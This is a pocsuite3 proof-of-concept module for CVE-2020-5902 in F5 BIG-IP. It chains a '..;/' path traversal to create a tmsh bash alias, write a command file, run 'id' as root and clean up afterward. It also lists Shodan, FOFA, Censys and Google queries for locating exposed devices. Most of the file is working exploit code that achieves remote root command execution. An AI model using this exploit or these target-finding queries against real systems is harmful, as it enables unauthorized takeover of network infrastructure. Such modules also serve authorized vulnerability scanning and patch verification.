"""
If you have issues about development, please read:
https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md
for more about information, plz visit http://pocsuite.org
"""

import re
from pocsuite3.api import Output, POCBase, POC_CATEGORY, register_poc, requests, logger, VUL_TYPE
from pocsuite3.lib.utils import random_str


class F5POC(POCBase):
    vulID = '98285'  # ssvid
    version = '1.0'
    author = ['z3r0yu']
    vulDate = '2020-07-08'
    createDate = '2020-07-10'
    updateDate = '2020-07-10'
    references = ['https://www.seebug.org/vuldb/ssvid-98285']
    name = 'CVE-2020-5902 RCE AND LFI'
    appPowerLink = ''
    appName = 'F5 BIG-IP load balancer'
    appVersion = '''
    BIG-IP 15.x: 15.1.0/15.0.0
    BIG-IP 14.x: 14.1.0 ~ 14.1.2
    BIG-IP 13.x: 13.1.0 ~ 13.1.3
    BIG-IP 12.x: 12.1.0 ~ 12.1.5
    BIG-IP 11.x: 11.6.1 ~ 11.6.5
    '''
    vulType = VUL_TYPE.COMMAND_EXECUTION
    desc = '''
    https://bacde.me/post/big-ip-cve-2020-5902-check-poc/
    https://mp.weixin.qq.com/s/WFrvqsgj3Ff8XJOIhG5ILA

    shodan
    http.favicon.hash:-335242539

    http.title:"BIG-IP%26reg;- Redirect"

    fofa
    title="BIG-IP%26reg;- Redirect"

    censys
    443.https.get.body_sha256:5d78eb6fa93b995f9a39f90b6fb32f016e80dbcda8eb71a17994678692585ee5

    443.https.get.title:"BIG-IP%26reg;- Redirect"

    google
    inurl:"tmui/login.jsp"

    intitle:"BIG-IP" inurl:"tmui"
    '''
    samples = []
    install_requires = ['']
    category = POC_CATEGORY.EXPLOITS.WEBAPP

    def _verify(self):
        result = {}
        # print(self.url)
        url = self.url.replace("http://", "")
        # print(url)

        try:
            url1 = 'https://{}/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=create+cli+alias+private+list+command+bash'
            url2 = 'https://{}/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp?fileName=/tmp/cmd&content=id'
            url3 = 'https://{}/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+/tmp/cmd'
            url4 = 'https://{}/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=delete+cli+alias+private+list'

            requests.get(url1.format(url), verify=False, timeout=5)
            requests.get(url2.format(url), verify=False, timeout=5)

            # flag = random_str(length=10)

            resp = requests.get(url3.format(url), verify=False, timeout=5)
            if 'uid=0(root)' in resp.text:
                r = requests.get(
                    'https://{}/tmui/login.jsp'.format(url), verify=False, timeout=5)
                hostname = re.search(
                    r'<p\stitle=\"(.*?)\">', r.text).group(1).strip().lower()
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = url
                result['VerifyInfo']['Hostname'] = hostname
        except Exception as ex:
            logger.error(str(ex))
        requests.get(url4.format(url), verify=False, timeout=5)
        return self.parse_output(result)

    def _attack(self):
        return self._verify()

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output


register_poc(F5POC)
